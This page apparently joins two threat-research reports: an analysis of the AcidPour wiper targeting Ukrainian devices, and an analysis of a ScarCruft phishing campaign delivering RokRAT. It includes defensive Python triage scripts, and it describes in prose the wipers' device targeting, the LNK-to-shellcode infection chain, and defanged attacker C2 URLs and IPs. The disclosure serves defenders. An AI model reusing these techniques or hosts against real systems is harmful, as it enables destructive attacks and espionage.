AcidPour | New Embedded Wiper Variant of AcidRain Appears in Ukraine

Executive Summary

  • SentinelLabs has discovered a novel malware variant of AcidRain, a wiper that rendered Eutelsat KA-SAT modems inoperative in Ukraine and caused additional disruptions throughout Europe at the onset of the Russian invasion.
  • The new malware, which we call AcidPour, expands upon AcidRain’s capabilities and destructive potential to now include Linux Unsorted Block Image (UBI) and Device Mapper (DM) logic, better targeting RAID arrays and large storage devices.
  • Our analysis confirms the connection between AcidRain and AcidPour, effectively linking the new variant to threat clusters previously publicly attributed to Russian military intelligence. CERT-UA has also attributed this activity to a Sandworm subcluster.
  • Specific targets of AcidPour have yet to be conclusively verified; however, the discovery coincides with the enduring disruption of multiple Ukrainian telecommunication networks, reportedly offline since March 13th.
  • The ISP attacks are being publicly claimed by a GRU-operated hacktivist persona via Telegram.

On March 16th, 2024, we identified a suspicious Linux binary uploaded from Ukraine. Initial analysis showed surface similarities with the infamous AcidRain wiper used to disable KA-SAT modems across Europe at the start of the Russian invasion of Ukraine (commonly identified by the ‘Viasat hack’ misnomer). Since our initial finding, no similar samples or variants have been detected or publicly reported until now. This new sample is a confirmed variant we refer to as ‘AcidPour’, a wiper with similar and expanded capabilities.

This is a threat to watch. My concern is elevated because this variant is a more powerful AcidRain variant, covering more hardware and operating system types. https://t.co/h0s6pJGuzv

— Rob Joyce (@NSA_CSDirector) March 19, 2024

Our technical analysis suggests that AcidPour’s expanded capabilities would enable it to better disable embedded devices including networking, IoT, large storage (RAIDs), and possibly ICS devices running Linux x86 distributions.

Following our initial reporting on Twitter, CyberScoop reported a claim from the Ukrainian SSSCIP attributing our findings to UAC-0165, clustered as a subgroup under the outdated ‘Sandworm’ threat actor construct. We reported our initial findings to partners on Saturday, followed by the public analysis thread on Twitter. Our analysis is ongoing.

AcidRain Context

On February 24th, 2022, a cyber attack rendered Eutelsat KA-SAT modems inoperable in Ukraine. Spillover from this attack rendered 5,800 Enercon wind turbines in Germany unable to communicate for remote monitoring or control and reportedly affected vital services across Europe.

On March 30th, 2022, we identified a wiper component which we dubbed ‘AcidRain’ as a part of the attack chain that caused this disruption by rendering Surfbeam2 modems inoperable in an attempt to disable vital Ukrainian military communications at the start of the Russian invasion.

During our original analysis of AcidRain, we assessed with medium confidence that there are developmental similarities between AcidRain and a VPNFilter stage 3 destructive plugin named ‘dstr’. In 2018, the FBI and Department of Justice attributed the VPNFilter campaign to the Russian government.

On May 10th, 2022, the European Union and its Member States issued an official condemnation of this activity, holding the Russian government responsible. Despite an abundance of wipers and cyber operations against Ukrainian targets in the subsequent months and years, we had not seen any further uses of AcidRain or similar components.

Enter AcidPour

On March 16th, 2024, we observed a new Linux wiper we are naming ‘AcidPour’. We alerted relevant partners immediately to stem the potential for any additional significant regional impact, followed by public dissemination of technical indicators and early analysis to alert the research community and encourage vigilance and contributions.

Our initial finding centered on surface similarities with AcidRain, so we placed a large emphasis on ascertaining whether a more conclusive relationship could be established between the two components at a technical level, as well as an understanding of its capabilities.

Technical Analysis

Where AcidRain is a Linux wiper compiled for MIPS architecture for compatibility with the devices targeted, AcidPour is compiled for x86 architecture. Despite both targeting Linux systems, the architecture mismatch somewhat limits our ability to compare the compiled codebases.

Notably, AcidRain was a ham-fisted wiper rather than a specifically tailored solution. It operates by iterating over all possible devices in hardcoded paths, wiping each, before wiping essential directories. Its lack of specificity suggests a lack of familiarity (or time) to adapt to the specifics of the Surfbeam2 targets. However, that also means that AcidRain can serve as a more generic tool able to disable a wider swath of devices reliant on embedded Linux distributions.

MD5: 1bde1e4ecc8a85cffef1cd4e5379aa44
SHA1: b5de486086eb2579097c141199d13b0838e7b631
SHA256: 6a8824048417abe156a16455b8e29170f8347312894fde2aabe644c4995d7728
Size: 17,388 bytes
Type: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Filename: ‘tmphluyl8zn’
First Submitted: 2024-03-16 14:42:53 UTC, Ukraine

The AcidPour variant is an ELF binary compiled for x86 (not MIPS), and while it refers to similar devices, the codebase has been modified and expanded to include additional capabilities. Our best automated attempts to compare across the two architectures yield only a low-confidence similarity of under 30%.

BinDiff output comparing AcidRain (MIPS) and AcidPour (x86)

We took that as a base measurement and proceeded to conduct a deep-dive analysis of the new binary with a focus on testing the hypothesis that the two are related variants, as well as detailing any net new capabilities.

Notable similarities include the use of the same reboot mechanism, the exact logic of the recursive directory wiping, and most importantly the use of the same IOCTL-based wiping mechanism used by both AcidRain and the VPNFilter plugin ‘dstr’.

Shared Reboot Mechanism

Recursive Directory Processing

Wiping Mechanisms

At the time of discovery, we noted the similarities between AcidRain’s IOCTL-based device-wiping mechanism and the VPNFilter plugin ‘dstr’, pictured below:

AcidPour relies on the same device wiping mechanism:

AcidPour’s IOCTL-based wiping mechanism

AcidPour’s Net New Functionality

AcidPour expands upon AcidRain’s targeted Linux devices to include Unsorted Block Image (UBI) and Device Mapper (DM) logic.

AcidRain’s supported devices:

/dev/sd* A generic block device
/dev/mtdblock* Flash memory (common in routers and IoT devices)
/dev/block/mtdblock* Another potential way of accessing flash memory
/dev/mtd* The device file for flash memory that supports fileops
/dev/mmcblk* For SD/MMC cards
/dev/block/mmcblk* Another potential way of accessing SD/MMC cards
/dev/loop* Virtual block devices

AcidRain targeted flash chips via MTD for raw access to flash memory in the form of /dev/mtdXX device paths. This capability is expanded in AcidPour to include /dev/ubiXX paths. UBI is an interface built on top of MTD to act as a wear-leveling and volume management system for flash memory. These devices are common in embedded systems dependent on flash memory like handhelds, IoT, networking, or in some cases ICS devices.

Block string array of device paths

AcidPour also adds logic for handling /dev/dm-XX paths to access mapped devices. The device mapper framework underpins logical volume management (LVM), abstracting physical storage into logical volumes for easier resizing, manipulation, and maintenance.

These devices act as virtual layers of block devices, enabling features like logical volumes, software RAID, and disk encryption. This would put devices like Storage Area Networks (SANs), Network Attached Storage (NASes), and dedicated RAID arrays in scope for AcidPour’s effects.

All Local, No imports

One of the most interesting aspects of AcidPour is its coding style, reminiscent of the pragmatic CaddyWiper broadly utilized against Ukrainian targets alongside notable malware like Industroyer 2.

AcidPour is written in C without linking any library or importing any symbols. Most functionality is implemented through direct syscalls, many of them issued via inline assembly and raw opcodes.

Example of a direct syscall implementation

This forces some unusual, seemingly archaic approaches to simple operations, such as storing and modifying the format strings for device paths as needed during execution.
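Both of the traits above, the hardcoded device-path families and the absence of any imports, can be checked statically during triage. The script below is an added example written for this page, not code from SentinelLabs or from the sample itself: it parses the ELF32 header and program headers, reports whether the file carries a PT_DYNAMIC or PT_INTERP entry (a statically linked binary with no libc has neither), counts raw `int 0x80` (CD 80) byte pairs as a rough proxy for direct syscalls, and searches for the device-path prefixes listed above, keeping the two AcidPour additions separate from the AcidRain set. The file it analyses is a constructed stand-in built by `build_sample()`; the `mov eax,1; int 0x80` stub, the format strings and the segment layout are assumptions for the demonstration, not facts about AcidPour.

```python
import struct

# Elf32_Ehdr and Elf32_Phdr layouts (little-endian), from the ELF specification.
ELF32_HDR = struct.Struct("<16sHHIIIIIHHHHHH")
ELF32_PHDR = struct.Struct("<8I")
PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3
EM_386, ET_EXEC = 3, 2
INT_0x80 = b"\xcd\x80"  # i386 `int 0x80`, the legacy Linux syscall gate

# Device-path prefixes named in the report: the AcidRain set and AcidPour's two additions.
ACIDRAIN_PATHS = [b"/dev/sd", b"/dev/mtdblock", b"/dev/block/mtdblock", b"/dev/mtd",
                  b"/dev/mmcblk", b"/dev/block/mmcblk", b"/dev/loop"]
ACIDPOUR_ADDITIONS = [b"/dev/ubi", b"/dev/dm-"]


def parse_elf32(data):
    """Parse an ELF32 little-endian header and its program headers; ValueError otherwise."""
    if len(data) < ELF32_HDR.size or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only ELF32 little-endian is handled here")
    fields = ELF32_HDR.unpack_from(data, 0)
    e_type, e_machine, e_phoff = fields[1], fields[2], fields[5]
    e_phentsize, e_phnum, e_shnum = fields[9], fields[10], fields[12]
    if e_phoff + e_phnum * e_phentsize > len(data):
        raise ValueError("program header table runs past end of file")
    phdrs = [ELF32_PHDR.unpack_from(data, e_phoff + i * e_phentsize) for i in range(e_phnum)]
    return {"type": e_type, "machine": e_machine, "phdrs": phdrs, "shnum": e_shnum}


def triage(data):
    """Surface the traits the report calls out: i386 executable, no dynamic linking,
    direct `int 0x80` syscalls, and hardcoded device-path families."""
    elf = parse_elf32(data)
    ptypes = {p[0] for p in elf["phdrs"]}
    return {
        "i386_exec": elf["machine"] == EM_386 and elf["type"] == ET_EXEC,
        "no_dynamic_linking": not (ptypes & {PT_DYNAMIC, PT_INTERP}),
        "no_section_headers": elf["shnum"] == 0,
        # Raw byte-pair count over the whole file: cheap, but data bytes can match too.
        "int80_sites": data.count(INT_0x80),
        "device_paths": [p.decode() for p in ACIDRAIN_PATHS + ACIDPOUR_ADDITIONS if p in data],
        "acidpour_additions": [p.decode() for p in ACIDPOUR_ADDITIONS if p in data],
    }


def build_sample(dynamic=False):
    """Constructed stand-in for a tiny statically linked i386 binary (NOT the AcidPour sample):
    one PT_LOAD segment, an `int 0x80` exit stub and a few device-path format strings.
    With dynamic=True a PT_INTERP header is added, which the triage must flag."""
    code = b"\xb8\x01\x00\x00\x00" + INT_0x80          # mov eax, 1 ; int 0x80  (exit)
    strings = b"/dev/mtd%d\0/dev/ubi%d\0/dev/dm-%d\0/dev/sd%c\0"
    body = code + strings
    nph = 2 if dynamic else 1
    phoff = ELF32_HDR.size
    body_off = phoff + nph * ELF32_PHDR.size
    base = 0x08048000
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # ELFCLASS32, ELFDATA2LSB, EV_CURRENT
    ehdr = ELF32_HDR.pack(ident, ET_EXEC, EM_386, 1, base + body_off, phoff, 0, 0,
                          ELF32_HDR.size, ELF32_PHDR.size, nph, 0, 0, 0)
    end = body_off + len(body)
    phdrs = ELF32_PHDR.pack(PT_LOAD, 0, base, base, end, end, 5, 0x1000)
    if dynamic:
        phdrs += ELF32_PHDR.pack(PT_INTERP, body_off, base + body_off, base + body_off, 0, 0, 4, 1)
    return ehdr + phdrs + body


if __name__ == "__main__":
    for flag in (False, True):
        print(triage(build_sample(dynamic=flag)))
```

Run it against a real file with `triage(open(path, "rb").read())`; a hit on `acidpour_additions` together with `no_dynamic_linking` and a non-trivial `int80_sites` count is a reason to pull the file for manual analysis, not a verdict on its own.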

Self-Delete

Perhaps as a response to the discovery of AcidRain, this new version now kicks off with a self-delete function. It maps the original file into memory, then overwrites it with a sequence of bytes ranging from 0 to 255 followed by a polite “Ok”.

AcidPour overwrites itself on disk at the beginning of its execution

Alternate Device Wiping Mechanism

At the time of our discovery of AcidRain, there was some confusion about the involvement of a wiper in taking down the Surfbeam2 modems. As we reverse engineered the malware, we found a second wiping mechanism that didn’t rely on IOCTLs. This alternate mechanism filled a buffer with the highest 32-bit value (0xFFFFFFFF) and proceeded to decrement by 1, overwriting its target with the result. That allowed us to connect AcidRain’s expected output with dumps of the affected devices.

Viasat incident
I managed to dump the flash of two Surfbeam2 modems: 'attacked1.bin' belongs to a targeted modem during the attack, 'fw_fixed.bin' is a clean one.
A destructive attack. pic.twitter.com/0QuTrLFR2A

— reversemode (@reversemode) March 31, 2022

With this crucial detail in mind, we were curious as to whether AcidPour implements an analogous alternate wiping mechanism.

Depending on the device type, a different wiping mechanism is engaged, overwriting the device repeatedly with the contents of a 256 KB buffer. The specifics of this alternate mechanism require further analysis.
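The decrementing pattern is what made the Surfbeam2 dumps attributable: an analyst can regenerate it and look for it in a flash image. The script below is an added example, not SentinelLabs’ code, that regenerates the pattern and finds the longest such run in a dump. It assumes a layout the text does not spell out, 32-bit little-endian words starting at 0xFFFFFFFF and decreasing by one per word; if the real granularity or endianness differs, change `WORD`. The two images it scans are constructed stand-ins, not real modem dumps.

```python
import struct

WORD = struct.Struct("<I")   # assumption: 32-bit little-endian words


def descending_pattern(num_words, start=0xFFFFFFFF):
    """Reproduce the overwrite pattern described for AcidRain: words starting at
    0xFFFFFFFF, each one less than the previous (word layout is an assumption)."""
    return b"".join(WORD.pack((start - i) & 0xFFFFFFFF) for i in range(num_words))


def longest_descending_run(data, start_value=None):
    """Walk `data` as 32-bit words and return (byte_offset, run_length_in_words, first_word)
    for the longest run in which every word equals its predecessor minus one.
    With start_value set, only runs beginning at that word are considered."""
    n = len(data) // 4
    best = (0, 0, None)
    i = 0
    while i < n:
        first = WORD.unpack_from(data, i * 4)[0]
        if start_value is not None and first != start_value:
            i += 1
            continue
        j = i + 1
        while j < n and WORD.unpack_from(data, j * 4)[0] == (first - (j - i)) & 0xFFFFFFFF:
            j += 1
        if j - i > best[1]:
            best = (i * 4, j - i, first)
        i = j
    return best


def matches_wiper_pattern(dump, min_run_words=64):
    """True when the dump holds a descending run from 0xFFFFFFFF of at least min_run_words words.
    Short runs can occur by chance in real data, hence the minimum length."""
    return longest_descending_run(dump, start_value=0xFFFFFFFF)[1] >= min_run_words


def build_dumps():
    """Constructed stand-ins: a 'clean' 4 KiB image, and the same image with 1 KiB of the
    pattern written over its second kilobyte."""
    clean = bytes((i * 7 + 3) & 0xFF for i in range(4096))
    wiped = clean[:1024] + descending_pattern(256) + clean[2048:]
    return clean, wiped


if __name__ == "__main__":
    clean, wiped = build_dumps()
    print(longest_descending_run(wiped, 0xFFFFFFFF))   # (1024, 256, 4294967295)
    print(matches_wiper_pattern(clean), matches_wiper_pattern(wiped))
```

Against a real dump, `longest_descending_run(open(path, "rb").read(), 0xFFFFFFFF)` also gives the offset and extent of the overwrite, which is useful for telling a partial wipe from a complete one.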

Attribution

Earlier this week, CERT-UA confirmed our findings and publicly attributed the activity to UAC-0165, considered a subgroup of the outdated Sandworm APT. UAC-0165 targets are commonly observed in Ukrainian critical infrastructure, including telecommunications, energy, and government services.

In September 2023, Ukraine SSSCIP publicly released a report on their latest findings of Russian linked threat activity. Notably, their section on UAC-0165 points to the continued use of GRU-linked, fake hacktivist personas as a medium for publicly announcing major intrusions and the leak of stolen data from Ukrainian victims.

On March 13th, the SolntsepekZ persona publicly claimed the intrusion into Ukrainian telecommunication organizations, three days prior to our discovery of AcidPour.

In addition to their Telegram presence, SolntsepekZ makes use of multiple domains under this persona. On Telegram, visitors are currently linked to solntsepek[.]com, which is associated with the hosting IP 185.61.137.155, of BlazingFast Hosting in Kiev. This hosting IP has previously hosted solntsepek[.]info as well as being related to solntsepek[.]org and similar to solntsepek[.]ru.

Review of the current state of these alleged target organizations indicates the impact is still ongoing. Below is an example notice currently on display from Triangulum, a group of companies providing telephone and Internet services under the Triacom brand, and Misto TV. Industry colleagues with Kentik are also observing this activity and have shared observations of the impact starting on March 13th as well.

Triacom (Translated)

Misto-TV (Translated)

At this time, we cannot confirm that AcidPour was used to disrupt these ISPs. The longevity of the disruption suggests a more complex attack than a simple DDoS or nuisance disruption. AcidPour, uploaded 3 days after this disruption started, would fit the bill for the requisite toolkit. If that’s the case, it could serve as another link between this hacktivist persona and specific GRU operations.

Conclusion

The discovery of AcidPour in-the-wild serves as a stark reminder that cyber support for this hot conflict continues to evolve two years after AcidRain. The threat actors involved are adept at orchestrating wide-ranging disruptions and have demonstrated their unwavering intent to do so by a variety of means.

The transition from AcidRain to AcidPour, with its expanded capabilities, underscores the strategic intent to inflict significant operational impact. This progression reveals not only a refinement in the technical capabilities of these threat actors but also their calculated approach to select targets that maximize follow-on effects, disrupting critical infrastructure and communications.

We continue to monitor these activities and hope the broader research community will continue to support this tracking with additional telemetry and analysis.

ScarCruft | Attackers Gather Strategic Intelligence and Target Cybersecurity Professionals

Executive Summary

  • SentinelLabs observed a campaign by ScarCruft, a suspected North Korean APT group, targeting media organizations and high-profile experts in North Korean affairs.
  • We recovered malware in the planning and testing phases of ScarCruft’s development cycle, presumably intended for use in future campaigns.
  • ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals.
  • ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies.

Overview

In collaboration with NK News, SentinelLabs has been tracking campaigns targeting experts in North Korean affairs from South Korea’s academic sector and a news organization focused on North Korea. We observed persistent targeting of the same individuals over a span of two months. Based on the specific malware, delivery methods, and infrastructure, we assess with high confidence that the campaigns are orchestrated by ScarCruft. Also known as APT37 and InkySquid, ScarCruft is a suspected North Korean advanced persistent threat (APT) group with a long history of targeted attacks against individuals as well as public and private entities, primarily in South Korea.

In addition, we retrieved malware that we assess is currently in the planning and testing phases of ScarCruft’s development cycle and will likely be used in future campaigns. In an interesting twist, ScarCruft is testing malware infection chains that use a technical threat research report on Kimsuky as a decoy document. Kimsuky is another suspected North Korean threat group observed to share operational characteristics with ScarCruft, like infrastructure and C2 server configurations. Given ScarCruft’s practice of using decoy documents relevant to targeted individuals, we suspect that the planned campaigns will likely target consumers of technical threat intelligence reports, like threat researchers, cyber policy organizations, and other cybersecurity professionals.

We observed ScarCruft using oversized Windows Shortcut (LNK) files that initiate multi-stage infection chains delivering RokRAT, a custom-written backdoor associated with the threat group. RokRAT is a fully-featured backdoor equipped with capabilities that enable its operators to conduct effective surveillance on targeted entities. In an attempt to execute undetected, the infection chains involve multiple executable formats and evasion techniques. They continue an existing trend, closely resembling the infection chains seen in ScarCruft activities from earlier in 2023, including the campaigns disclosed by AhnLab in April 2023, Check Point in May 2023, and Qi An Xin in July 2023.

By targeting high-profile experts in North Korean affairs and news organizations focused on North Korea, ScarCruft continues to fulfill its primary objective of gathering strategic intelligence. This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Korea’s decision-making processes.

ScarCruft’s focus on consumers of technical threat intelligence reports suggests an intent to gain insights into non-public cyber threat intelligence and defense strategies. This helps in identifying potential threats to their operations and contributes to refining their operational and evasive approaches. As we continue to track suspected North Korean threat actors and their pace of experimentation, we assess they have a growing interest in mimicking cybersecurity professionals and businesses, ultimately for use in the targeting of specific customers and contacts directly, or more broadly through brand impersonation.

ScarCruft Campaigns

A phishing email, impersonating a member of the North Korea Research Institute (Institute for North Korean Studies, INKS), was sent from the email address kirnchi122[@]hanmail.net on December 13, 2023, targeting an expert in North Korean affairs. The email contains an attached archive file named December 13th announcement.zip (machine translation from Korean), which includes nine files.

The files claim to be presentation materials from a fabricated event relevant to the targeted individual — an apparent human rights expert discussion meeting. To make the phishing email current and therefore more credible, the email asserts that the meeting occurred on the same date the email was sent (December 13).

ScarCruft Phishing email (in Korean)

Among the nine files, seven are benign Hangul Word Processor (HWP) and PowerPoint documents, while two are malicious LNK files. LNK files have become popular among threat actors for malware deployment since Microsoft announced that Office applications would, by default, block the execution of macros in documents originating from untrusted sources.

In an attempt to make the malicious LNK files blend among the benign files, all files have names that relate to human rights in North Korea and start with a number assigned to each file. Furthermore, the LNK files disguise themselves as Hanword documents, using the Hangul Word Processor icon (the Icon location LNK artifact was set to C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe).

Filename Machine translation
1. 전영선 북한 주민 정보접근권 강화방안.hwp 1. Jeon Young-seon’s plan to strengthen North Korean residents’ right to access information.hwp
2.이상용 반동사상문화배격법과 정보 유입 활동의 변화.pptx 2. Lee Sang-yong’s reactionary ideology cultural rejection law and changes in information inflow activities.pptx
3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk 3. Lee Yun-sik’s North Korean Human Rights Act implementation plan centered on the launch of the North Korean Human Rights Foundation.lnk
5. 여현철 북한주민 정보접근권 강화 방안.hwp 5. Yeo Hyeon-cheol’s plan to strengthen North Korean residents’ right to access information.hwp
6. 이종겸 북한인권 토론회 토론문.hwp 6. Lee Jong-gyeom North Korean human rights debate discussion paper.hwp
7. 박유성 북한주민 정보접근 강화방안.hwp 7. Park Yoo-sung’s plan to strengthen North Korean residents’ access to information.hwp
8. 이도건 북한연구소 토론회.lnk 8. Lee Do-gun North Korean Research Center Discussion.lnk
9. 김태원 북한인권 전문가 토론회 토론문.hwp 9. Taewon Kim, North Korean human rights expert discussion paper.hwp
10. 서유석 북한 주민들의 알권리 제고 방안.hwp 10. Seo Yoo-seok’s plan to improve North Korean residents’ right to know.hwp

The LNK files exceed 48 MB and implement a multi-stage mechanism deploying the RokRAT backdoor.

ScarCruft Infection chain: 8. 이도건 북한연구소 토론회.lnk

The LNK files execute PowerShell code that performs the following actions:

  • Locates the executing LNK file based on its filesize.
  • Extracts from the LNK file a decoy document (in HWP and HWPX format), a Windows Batch script named 111223.bat, and a PowerShell script named public.dat, placing the script in the %Public% folder.
  • Displays the decoy document and executes 111223.bat.
  • Deletes the executing Shortcut file.

The PowerShell code locates the content of the files it extracts from the LNK file based on hardcoded offsets.

ScarCruft PowerShell code

111223.bat then executes the PowerShell script stored in %Public%\public.dat. This script decodes and executes another hex-encoded PowerShell script embedded in public.dat.

The content of public.dat

The decoded script downloads from a major Cloud file hosting provider a file named myprofile[.]zip, XOR-decrypts the file using the first byte as an XOR key, and executes the decrypted content in a thread.

myprofile[.]zip contains shellcode that deploys the RokRAT backdoor. RokRAT uses public Cloud services for command-and-control purposes, such as pCloud and Yandex Cloud, disguising malicious communication as legitimate network traffic.
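Each extraction step in this chain (an oversized LNK, a payload carved at a fixed offset, a hex-encoded stage, a file XOR-decrypted with its own first byte) is simple to reproduce, and reproducing it is how an analyst gets at the decoy and the next stage without running the shortcut. The script below is an added example written for this page, not code from the report or from the malware. It validates the Shell Link header, flags an abnormal file size, locates ZIP-style (50 4B 03 04) payloads inside the shortcut the way the test-phase variant described later does, and undoes the two encodings. The LNK it runs against is a constructed stand-in, and the 1 MiB size threshold, the sample hex string and the XOR key are assumptions for the demonstration.

```python
import struct

LNK_HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046} as stored on disk (first three fields little-endian).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
PK_LOCAL_FILE_HEADER = b"PK\x03\x04"   # ZIP local file header: HWPX and OOXML decoys start this way


def is_lnk(data):
    """Shell Link header check: HeaderSize == 0x4C followed by the LinkCLSID."""
    return (len(data) >= LNK_HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def find_embedded(data, magic=PK_LOCAL_FILE_HEADER, start=LNK_HEADER_SIZE):
    """Offsets of `magic` after the LNK header. The December 2023 shortcuts carved at hardcoded
    offsets; searching for the byte pattern generalises that (the test-phase variant did the same)."""
    offsets, pos = [], data.find(magic, start)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(magic, pos + 1)
    return offsets


def carve(data, offset, length=None):
    """Slice an embedded file out of the shortcut (length=None takes everything to the end)."""
    return data[offset:] if length is None else data[offset:offset + length]


def decode_hex_stage(text):
    """public.dat carried its second PowerShell stage as a hex string; whitespace is tolerated."""
    return bytes.fromhex("".join(text.split()))


def xor_first_byte(blob):
    """myprofile.zip scheme: the first byte is the XOR key for everything that follows."""
    if not blob:
        raise ValueError("empty blob")
    key = blob[0]
    return bytes(b ^ key for b in blob[1:])


def triage_lnk(data, oversize_threshold=1 << 20):
    """Report whether the file is a shortcut, whether it is far larger than any real LNK
    needs to be (threshold is an assumption), and where ZIP-style payloads start inside it."""
    lnk = is_lnk(data)
    return {"is_lnk": lnk, "size": len(data), "oversized": lnk and len(data) > oversize_threshold,
            "pk_offsets": find_embedded(data) if lnk else []}


def build_sample(padding=8192):
    """Constructed oversized-LNK stand-in: valid header, filler, a ZIP-style decoy, then padding.
    Returns (sample, decoy) so the carve can be checked."""
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + bytes(LNK_HEADER_SIZE - 20)
    decoy = PK_LOCAL_FILE_HEADER + b"constructed decoy body"
    return header + bytes(512) + decoy + bytes(padding), decoy


if __name__ == "__main__":
    sample, decoy = build_sample()
    report = triage_lnk(sample, oversize_threshold=4096)
    print(report)
    print(carve(sample, report["pk_offsets"][0], len(decoy)))
```

On a real sample, the carved region runs from the PK offset to the start of the next embedded file (the batch script and `public.dat` in the December chain), so `carve()` is usually called with the gap between consecutive offsets rather than with `length=None`.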

ScarCruft PowerShell script executing shellcode

While most of the documents we analyzed are stripped of metadata, a HWPX decoy document stands out by containing metadata that identifies the pseudonym bandi as the document’s creator. We note the use of the same string in the context of Kimsuky activities, for example, in an email address used in a phishing campaign (bandi00413[@]daum.net) and in a C2 server domain (one.bandi[.]tokyo).

While the overlap in pseudonym use does not represent a strong link between the groups from a technical perspective, it is still indicative of the suspected relations between them. In the context of North Korea, the term bandi is known as the pseudonym of a suspected North Korean author known for publishing dissident writing. bandi also means ‘firefly’ in Korean.

The bandi pseudonym (HWPX document metadata)

Earlier Overlapping Campaign

Some of the individuals targeted in the December 2023 ScarCruft activity, discussed above, were also targeted approximately one month earlier on November 16, 2023. This speaks to the adversary’s persistence and adaptability in pursuing its goals. The November campaign included individuals from a news organization focused on North Korea as well.

A phishing email, impersonating a member of the North Korea Research Institute, was sent from the address c039911[@]daum.net. The email attaches two malicious HWP files, titled 조선 시장 물가 분석(회령).hwp and 조선 시장 물가 분석(신의주).hwp, machine translated as Shipbuilding market price analysis (Hoeryeong).hwp and Shipbuilding market price analysis (Sinuiju).hwp; 조선 here is the North’s own name for Korea rather than ‘shipbuilding’, so the titles actually read as North Korean market price analyses for Hoeryong and Sinuiju, and the documents are disguised as North Korean market price analysis data.

Phishing email (in Korean)

The documents contain OLE objects, activated by double-clicking on the document’s content. In adherence to the HWP document format, the OLE objects are stored as compressed Structured Storage objects, and their decompression reveals C2 URLs accessed upon OLE object activation.

The HWP documents contain metadata, including the LinkValue, Last Saved By, and Author metadata values, which provide information on the system accounts where the documents have been created.

HWP document C2 URL and metadata
조선 시장 물가 분석(회령).hwp http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC
LinkValue: \Users\Moo\AppData\Local\Temp
Last Saved By: Moo
Author: Moo
조선 시장 물가 분석(신의주).hwp http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk_001
Author: dailynk01

The DailyN~1/dailynk_001/dailynk01 account is particularly interesting since it relates to Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea with which we have collaborated in the past. The focus of this organization makes them an attractive target for North Korean threat actors seeking to intrude or impersonate it, a strategy previously observed by SentinelLabs in past Kimsuky campaigns. It remains to be investigated whether this account is used for developing malware involved in Daily NK-related campaigns and/or serves as an additional indicator of the suspected relations between Kimsuky and ScarCruft. Additionally, in our previous reporting on the overlap of suspected North Korean intrusions into a Russian missile engineering organization, we shared links to ScarCruft infrastructure making use of this same illicit naming scheme, such as dallynk[.]com.

Pivoting on the DailyN~1 artifact revealed additional HWP documents that share overlapping metadata information and employ the same OLE-based infection vector, using different C2 URLs.

HWP document (SHA-1 hash) C2 URL and metadata
e9df1f28cfbc831b89a404816a0242ead5bb142c http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk01
Author: umgdnk-03
2f78abc001534e28eb208a73245ce5389c40ddbe http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk_001
Author: /

The app.documentoffice[.]club domain is also used as C2 endpoint for malicious Microsoft Office documents, employing ActiveX controls to establish communication with the C2 server.

Office document (SHA-1 hash) C2 URL
e46907cfaf96d2fde8da8a0281e4e16958a968ed http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950
39c97ca820f31e7903ccb190fee02035ffdb37b9 http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE
577c3a0ac66ff71d9541d983e37530500cb9f2a5 http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6

At the time of analysis, the C2 URLs were inactive, preventing us from examining their functions and any potential additional payloads they might deliver to the targets. We are still investigating the role of the user and view query parameter values, such as 5JV0FAGA6KW1GBHB7LX2HCIC and H11I75PFF0ZG53NDG00H64OE.

While preparing this report, Genians released research that outlines ScarCruft campaigns throughout 2023, covering certain aspects of the activities discussed in this section. We add to the public information on this activity cluster by providing additional details on the related infrastructure.

Infrastructure associated with this cluster of suspected North Korean threat activity leads to multiple interesting details which we have found useful for further monitoring and analysis of separate campaigns. The domains offlinedocument[.]site and documentoffice[.]club both make use of a variety of subdomains such as open, nav, and app as previously mentioned. During their illicit use, the domains temporarily make use of Lithuania’s Cherry Servers virtual private server (VPS) hosting service – 84.32.131[.]87, and 84.32.131[.]104 in this case.

A repeating trend is the actor registering domains through Namecheap, leaving the domain parked on a Namecheap IP address, and then rotating to Cherry Servers. In separate domains, we observe this same operational workflow, and interestingly other domains which the actor only makes use of for one or two days before shifting back to a parked IP address. We assess this process aims to limit detection and analysis capabilities following their malicious activity, such as hosting a phishing login or malware delivery link.

Examples of this activity can be found through publicly available telemetry, such as that of instantreceive[.]org. This domain hosted a page mimicking GitHub, a characteristic not new to North Korea-attributed threat actors, as we have reported on in the past.

GitHub phishing page

This domain overlaps through the use of unique Cherry Servers hosting IPs, which can be used for further moderate-confidence infrastructure pivoting. We encourage readers to conduct additional research and monitoring. The full list shown here is provided in the IOC table.
